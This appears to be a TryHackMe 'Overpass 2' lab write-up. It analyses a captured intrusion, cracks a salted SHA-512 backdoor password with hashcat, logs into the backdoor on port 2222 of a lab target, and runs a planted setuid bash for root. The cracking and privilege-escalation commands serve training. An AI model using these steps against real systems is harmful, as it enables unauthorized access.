【THM】Overpass2-Hacked-Practice

Forensics - Analyse the PCAP

The Overpass server has been hacked! The company's SOC team noticed suspicious attack activity late at night and managed to capture the network traffic from the time the attack took place.

Can you work out how the attacker got in and compromised Overpass's production server?


What payload did the attacker use to gain access?


What password did the attacker use to privesc?


Five lines of data can be seen here.


Using the fasttrack wordlist, how many of the system passwords were crackable?


Research - Analyse the code

https://github.com/NinjaJc01/ssh-backdoor/


```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hash-identifier
   #########################################################################
   #   hash-identifier v1.2                                                #
   #   By Zion3R  -  www.Blackploit.com  -  Root@Blackploit.com            #
   #########################################################################
--------------------------------------------------
 HASH: 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

Possible Hashs:
[+] SHA-512
[+] Whirlpool

Least Possible Hashs:
[+] SHA-512(HMAC)
[+] Whirlpool(HMAC)
--------------------------------------------------
 HASH:
```

Next, look up the matching hashcat hash mode.

It should be mode 1710 (sha512($pass.$salt)).

To crack the hash, we supply the attacker's SHA-512 hash found in the packet capture together with the hard-coded salt found in the backdoor's main.go file (the final input has the form hash:salt). We write the hash:salt pair into a text file and then run hashcat against that file.

```
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
```

```
>hashcat.exe -m 1710 -a 0 hash.txt rockyou.txt
```
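As an added example (not code from the writeup or from the ssh-backdoor project), the Go snippet below reproduces the hashing scheme that mode 1710 implies: SHA-512 over the password followed by the salt, hex-encoded. That ordering is why the hash:salt line above is cracked with -m 1710 rather than -m 1720 (salt then password). The password and wordlist are constructed; the salt is the one quoted above; the password+salt ordering is assumed from the hashcat mode chosen in the writeup.

```go
package main

import (
	"crypto/sha512"
	"encoding/hex"
	"fmt"
	"strings"
)

// hashPassword reproduces the scheme hashcat mode 1710 describes:
// sha512(password + salt), hex-encoded. Assumed to match the backdoor's
// main.go; swapping the order would require mode 1720 instead.
func hashPassword(password, salt string) string {
	sum := sha512.Sum512([]byte(password + salt))
	return hex.EncodeToString(sum[:])
}

// hashcatLine formats the pair in the hash:salt form hashcat expects for -m 1710.
func hashcatLine(hash, salt string) string {
	return hash + ":" + salt
}

// checkCandidates mirrors what hashcat does in -a 0 (straight wordlist) mode:
// hash every candidate with the salt and compare against the target.
// Returns the matching word and true, or "" and false when nothing matches.
func checkCandidates(target, salt string, wordlist []string) (string, bool) {
	target = strings.ToLower(target)
	for _, w := range wordlist {
		if hashPassword(w, salt) == target {
			return w, true
		}
	}
	return "", false
}

func main() {
	// Constructed demo values: this is NOT the challenge's real password.
	salt := "1c362db832f3f864c8c2fe05f2002a05" // salt as quoted in the writeup
	h := hashPassword("example-pass", salt)
	fmt.Println(hashcatLine(h, salt))
	w, ok := checkCandidates(h, salt, []string{"letmein", "example-pass"})
	fmt.Println(w, ok)
}
```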


Attack - Get back in!

```
nmap -p- -sC -sV -T4 10.10.240.3
```

```
Nmap scan report for 10.10.240.3
Host is up (0.20s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
|   256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_  256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
|_  2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Visiting port 80:


The nmap scan above shows SSH running on both port 22 and port 2222 of the target. Based on what has been collected so far, we first try to SSH in as the user james with the original account password seen while analysing the PCAP; the logins on both port 22 and port 2222 fail. We then try the password obtained in the previous section by cracking the SHA-512 hash: the login on port 22 fails, but the login on port 2222 succeeds (the main.go file in the backdoor's GitHub project also shows that the backdoor listens on port 2222).

```
ssh james@10.10.240.3 -p 2222
```

Newer OpenSSH clients disable the ssh-rsa host-key algorithm by default; if the client refuses the backdoor's RSA host key, re-enable it explicitly:

```
ssh james@10.10.240.3 -p 2222 -o HostKeyAlgorithms=+ssh-rsa
```


We can see there is a file named .suid_bash.


```
james@overpass-production:/home/james$ file .suid_bash

.suid_bash: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=12f73d7a8e226c663034529c8dd20efec22dde54, stripped

james@overpass-production:/home/james$ ./.suid_bash -p
```